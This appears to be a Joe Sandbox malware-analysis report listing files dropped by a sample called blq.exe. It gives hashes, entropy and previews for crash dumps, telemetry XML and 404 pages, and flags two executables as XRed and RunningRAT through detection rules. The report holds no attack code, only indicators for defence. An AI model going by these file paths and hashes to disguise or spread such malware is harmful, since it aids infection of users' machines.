                                                                                        MD5:6FD49605B64A1832E9ABF598E85A3F85
                                                                                        SHA1:785B80BA20949EED69304B62092A1F455C1CB4E3
                                                                                        SHA-256:A0670F32602E0D2563A15C616496CE6346A5E60BC41B69D52E4008118DC7CB7E
                                                                                        SHA-512:1230BFCE3144F2C2E9A02D1FB8BEB1AD0D2DE8D9CB6BD7798227095A81730500F7F520510D9443FC7EFAC34226BDB3993AFAB8F52DE0DF9473A7C3B41F4EBC2E
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.4.<./.P.i.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4572
                                                                                        Entropy (8bit):4.448440392778124
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZtJg77aI9S9xu9CWpW8VYFYm8M4JF6EFT+q842+n75bZ4d:uIjfZHI7A87VBJgyU+n75bZ4d
                                                                                        MD5:9B0442AEA4BC6A1B417A0848B03D68C8
                                                                                        SHA1:23E0609F7D624A90EECF7735485807679C6F5BA2
                                                                                        SHA-256:324EDA7E8737AF119D1839CF6A30F81A7EE417448EC0AD29A0F448A183D23791
                                                                                        SHA-512:AB81FD2AEBA115C6E71E921672E40AF051B0D3FE51B036961149E5DCC54151F407DFD6A3F6A658582673FA39590CC21951994E348E7FC0C577D333AC067912E3
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645855" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):89278
                                                                                        Entropy (8bit):3.1104531659980235
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:z4OyZ5V17Arrb/IdyQat5EWRLEZ/ger2q:z4OyZ5V17Arrb/IdyQabEWRLEZ/ger2q
                                                                                        MD5:304C4B08E508F07496984AC2E361E380
                                                                                        SHA1:DAF545B00D4F2A1198BDC25712DD50EE17685594
                                                                                        SHA-256:B28942754F75DDE51B3E73FA504B2201EEC5D8B4FD33DD5FCA471757ED196122
                                                                                        SHA-512:17422355B5A028FA0ED9901BF72FE144885BA34417BC29A72F61E51D64F0B61F8A35CEB8F9DBDBA54A8051920330C0049A62231342432EB7B6133E87DCB07DD1
                                                                                        Malicious:false
                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):13340
                                                                                        Entropy (8bit):2.6871470090051806
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:TiZYWocXoZYFYEcWZSHQYEZtttKikIbdFwarDnqajmtM/8HIE03:2ZDYS7ThlGajmtM/8oE03
                                                                                        MD5:109A975338FC1D5C05A6F471318F927C
                                                                                        SHA1:39BDB0DEAD36A926F78BB6E7A268561BD439FED8
                                                                                        SHA-256:E17559EE469F12C4883B2EB3BB33FE3C0F5A1990EDC505C4A7A11B9F8B5BA448
                                                                                        SHA-512:BF9BC7B3E5DB3AC1BA53D44E76AF01F949BDFCDF8AE92EE375BE6E57F6152FE50D6615329566A98F000E9CDA5D7D4889A0D6A78D26CA25A6869BEE70B7A5040A
                                                                                        Malicious:false
                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Tue Dec 24 21:12:49 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):7885078
                                                                                        Entropy (8bit):2.0982081327119086
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:U/dBMeX6AojnIcG/Bdc0LhnyxOiE7px0XbVC:0jMeX6Jjb8Bdc0L5yxOiE7p6BC
                                                                                        MD5:D6CFA0B529547C4AA2B67A82B8D0C572
                                                                                        SHA1:1991EA417CCE1B4FCE9C0ED417DD927F91EDA379
                                                                                        SHA-256:FC36FE06881D5EBDA012A5413728574E5B8C7468088CF8AF1F6C3F3FE8CDC148
                                                                                        SHA-512:94A17352B216D10BE018BD14B34CCFCD63E1E1D8AC357BA7DB92FA85AC70B67B4E9F2905C1CDAF5D037C07CCE78C58F4CF3E2E7730AFE7BAD80DEAEDF23B0BA6
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):6322
                                                                                        Entropy (8bit):3.7174391866795453
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJExN6INZCYirJkfbpD089b2fsfYSm:R6lXJq6INMYGJkX2Ef8
                                                                                        MD5:27AF5816E9E5D5FEA18327D1F4D65DFA
                                                                                        SHA1:98A0067DEE7D899727C8D0C38D541BABF423DF3A
                                                                                        SHA-256:555F1C13BC1C4897A2F0901416299F2C0F38418F6D2926557D5EB7C2A9F065CC
                                                                                        SHA-512:DAB97C0993736BB0828A9C2B6757D4F62921ACCD527888FFE799F0DDD8240723D821C560BE34497144528689C228C164BEE76520A619852C534B2274CF622F10
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.4.<./.P.i.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):4580
                                                                                        Entropy (8bit):4.4468103602131075
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:cvIwWl8zsZtJg77aI9S9xu9CWpW8VYpYm8M4JFFF4+q8Zin75bZ4d:uIjfZHI7A87VJJiJn75bZ4d
                                                                                        MD5:0DD8F536B0C74D8D2222FA07869BEB18
                                                                                        SHA1:0C386D5F72A9CF9995261AF292FED0EA836C63BC
                                                                                        SHA-256:30F9613CF410F82112A8550141339B939B70B743648A8947550FA83FE2AFCA54
                                                                                        SHA-512:922476C911D112CE52605CC76AF6778FEF5588E63BD5E9DAA1668FBC3A55DD09660D45008AB7C7C8EF72B3F3AC18C8A63A933EDF6BFEF2796641004A134BE23C
                                                                                        Malicious:false
                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645855" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):89370
                                                                                        Entropy (8bit):3.110912936468549
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:a1Ury9iBGkkW0WgjiIq3n85EWRLEZ/gt6WGI:a1Ury9iBGkkW0WgjiIq3nwEWRLEZ/gt/
                                                                                        MD5:0A7227CB919E375CF29D1F71B7A07922
                                                                                        SHA1:62ABAA370286C6852F227A249589629D5C862BC5
                                                                                        SHA-256:68E567AD786AC8BBBA78014E8A7344BB9947A562926E2E57B5EAA24FDADAB2A4
                                                                                        SHA-512:AF2D7E500E96790FC6246C2FCAEE3A77E75513F9C422426E3A1B9AF72E4A16D22AFA319536F1535C1FE7168AC53BD5888C3FC4C113926CCB87B24C0DEC6D668F
                                                                                        Malicious:false
                                                                                        Preview:ImageName,UniqueProcessId,NumberOfThreads,WorkingSetPrivateSize,HardFaultCount,NumberOfThreadsHighWatermark,CycleTime,CreateTime,UserTime,KernelTime,BasePriority,PeakVirtualSize,VirtualSize,PageFaultCount,WorkingSetSize,PeakWorkingSetSize,QuotaPeakPagedPoolUsage,QuotaPagedPoolUsage,QuotaPeakNonPagedPoolUsage,QuotaNonPagedPoolUsage,PagefileUsage,PeakPagefileUsage,PrivatePageCount,ReadOperationCount,WriteOperationCount,OtherOperationCount,ReadTransferCount,WriteTransferCount,OtherTransferCount,Han
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):13340
                                                                                        Entropy (8bit):2.6871392433520946
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:TiZYW0etxMth2LYvYxW0HQYEZbGtNikI1dxwe8b/aVmWMktonII03:2ZD0eqqoN1aaVmWMktoII03
                                                                                        MD5:BC1BDE813DF5263CE026E7AF6D5BE38A
                                                                                        SHA1:CBF77AAE65108EF8E45ED380585CA16548DE1559
                                                                                        SHA-256:C2F75CD8DC843C23C830698E4FC3626E94EFC1A8C1EF46FB8042716CBF1FFF05
                                                                                        SHA-512:39A7DCFCF109A69CB70B2067D3C23C041F2E22D330F2AE034CEE494639B43130844E55C89B638E0D1723EDA78CBB8AE95C189F6867A2D207164964803779CF7B
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Mini DuMP crash report, 15 streams, Tue Dec 24 21:12:24 2024, 0x1205a4 type
                                                                                        Category:dropped
                                                                                        Size (bytes):6832308
                                                                                        Entropy (8bit):2.195506302364893
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:zmcz3LyMeX6KMNPI0w/JdN03JkVzTiE7pI17DR:DzuMeX6PNDGJdN03SVzTiE7pQF
                                                                                        MD5:95D25469F49DBD8CD9A8D4B33F800CAE
                                                                                        SHA1:47F041E0B985A083A2E072E59A5C3D5D4C3C2F0C
                                                                                        SHA-256:58F9E0E115F8B5A8799E3D9BB5C747A4ED4DA0F1A1E9507742006AFD06E63F8A
                                                                                        SHA-512:33229D8A6374FA18FE8274C46094A23CFF81F0503384D7251B5C18F96CDB03CD85AD496D1125962389148B4E4A8AE4323E8B80FDB604E04E2BDE0A91A7BE41C3
                                                                                        Malicious:false
                                                                                        Process:C:\Users\user\Desktop\blq.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:modified
                                                                                        Size (bytes):771584
                                                                                        Entropy (8bit):6.622826360248542
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I5r:ansJ39LyjbJkQFMhmC+6GD9G
                                                                                        MD5:64C0A5B375F1AB0C44808320D5AF9E84
                                                                                        SHA1:F24C7694E6CF1763C1A98BD1A27152BED1EBFF82
                                                                                        SHA-256:05B222D35057310611697B4D0EE99656F9956BD421785AEDFA3B928000F07801
                                                                                        SHA-512:2353837EB7A446CEF1863C1488204619716F4BEB14371FBC9F1D6A07D3336452F7DA8E6A078C4335EA2086494F292908C7DCA5C8A7F1A371CD9DC14F997EC217
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCXAFD2.tmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXAFD2.tmp, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                        Process:C:\Users\user\Desktop\blq.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):820736
                                                                                        Entropy (8bit):6.5618190433891295
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:GMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9zl6MMuj:GnsJ39LyjbJkQFMhmC+6GD99h
                                                                                        MD5:6153A06B74491BACB664BF142B598C69
                                                                                        SHA1:DADE36A11A568E3B0B5F3E7FD44B566182702534
                                                                                        SHA-256:0B510380E52B3C97E7A2F227EB9ECDA6A194885DA74FAC6630F1EB7D5EE6091F
                                                                                        SHA-512:BB1C20CE4B2AE5E3524E1127ECA6047AB897DA49D8B66E435E8D81F418DC16C7C6345887AE67C9CA7EA0F39D175EEDACE8DABC74BE9DB9EA492CA4C489EC4721
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_RunningRAT, Description: Detects RunningRAT, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: ditekSHen
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                        Process:C:\Users\user\Desktop\blq.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.283877430783821
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0xDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ED+pAZewRDK4mW
                                                                                        MD5:FAFF403D597B97667998FCAC9CDC445B
                                                                                        SHA1:D67B7546E229C6CE0EEB866DBBDB57A2C2BB7B97
                                                                                        SHA-256:288F45734A783CE02A6832C0BAB79D5DB6A463E3D2CA0A0EC97A54BCFC5568A5
                                                                                        SHA-512:C5C29BA23617A343B89C6C0F70F46150A5AF727ED86AF6DF6D36430B5EE9F3993769373E1B3B82174EB3EB1E239E0AD122FA5E8DA5C1C5D5B762F75C48497992
                                                                                        Malicious:false
                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="P9BHZZe6CJMSwSTXxRH9Yg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.2659183034924855
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0PSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4+pAZewRDK4mW
                                                                                        MD5:17578FC0D8C63717FB78181AE07710B4
                                                                                        SHA1:79BB49E973D66BB7F710F13422263A3AEE61C349
                                                                                        SHA-256:C08F7AABEDD1CAAFFBFD9D78DFE0D06CCA76E1DAA37A687A25CEB31D0F1FC426
                                                                                        SHA-512:A7E61B66A2CEBF929B0C4A7A4AC5155F6D97C4E97E7E262CF3657D6798D9730A861341DC0A0997E372FF38D01512F6DDFF2EFB535E5933A9989CBC154E88BDF5
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.261928432599524
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0koSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9o+pAZewRDK4mW
                                                                                        MD5:929F7AC09B2A6EC315C7BCD7F60F78D9
                                                                                        SHA1:D912E9373FFD09AC391ACA21D9C59D17CF182EE3
                                                                                        SHA-256:8A28D9FDDA5213C401F6FE35985B0968146CE68636AEA1CDB859C42CF4732C2C
                                                                                        SHA-512:FFD2F3D8CF1D53A3DC310F969800A649A642AFFFEB8325A838868EA0CDA0EDB919465D97D8C47481BBE8CC6ADD5CB09E670150DFF5022AA1B8D53335ACC14531
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.260955084859783
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0VaSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                        MD5:07A5511F7DCC8751562558FD41B3CD16
                                                                                        SHA1:CD37F1C14B19FB328E82DB572F1AEC9F045CF94B
                                                                                        SHA-256:5675270B5CF1FBCA5129B834D460EE5C47C1778F96F06A488F0DE81F296828EC
                                                                                        SHA-512:2A52D102336E0A917F6453E3D3777ACA1D0D2BD5AF0935DCE9BB68415C3F1A2193686F733CCBA814724EA6356274807D75FE37F3DD996A99041EEFF29A95E5A9
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.2639761184554335
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0d4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+u4+pAZewRDK4mW
                                                                                        MD5:8EB27726E79A8D89F4F90E59F4F83661
                                                                                        SHA1:CFEA871475B11C2E8C4E883E12D4D3F80EAE82CC
                                                                                        SHA-256:40134F1EA1E95BCBEB141484F1155E174030F4D258BF1E686A854A38F48B44BB
                                                                                        SHA-512:BF98ED2BD5AA9644787ACEAC21199CB9D71F08A7FF00E507C47A8E6733C0144D75924F95B7A3DA0F89B67FFCD2767B870D4BA9CA71EB4F842E97D4C6D4C1D3D5
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.259281723941837
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0PlnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8V+pAZewRDK4mW
                                                                                        MD5:6F6471A16ABC175E0C200EDFA9E529E2
                                                                                        SHA1:491604A20C4DDACE944916186DB464F5823E27FB
                                                                                        SHA-256:2292242EFF674AE0A612E34B303F2BF1B947221649992F9B38E7E2C02990A114
                                                                                        SHA-512:787BD2A2AAE7764033E57A0B7E68A20A9EFACE62E3F340F8B8D76B3071420F8059AA7C202A095800E6254B1D37D02598FEF44D77D996F9633F060AB90DFE219E
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.261591737544051
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0lprXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w+pAZewRDK4mW
                                                                                        MD5:7ADBED4F6EEA5DE16D947AF95521D9D7
                                                                                        SHA1:A2EF58A4B2E87713859814A27CED8ABBBFB0D498
                                                                                        SHA-256:CA39AF9ED4842EE9BDE514E72FB64AEC72755DE57991A6E348A9E8A243933186
                                                                                        SHA-512:CB077CFAB5A089B6FD23CA097747E2B58911929DA59FFAC678A36762C7207FB2B9A8DC174CD969A7ABF227CAD20BBA54B49D1B4E82B6875BD6E22C3DEE8C8353
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.268872826931782
                                                                                        Encrypted:false
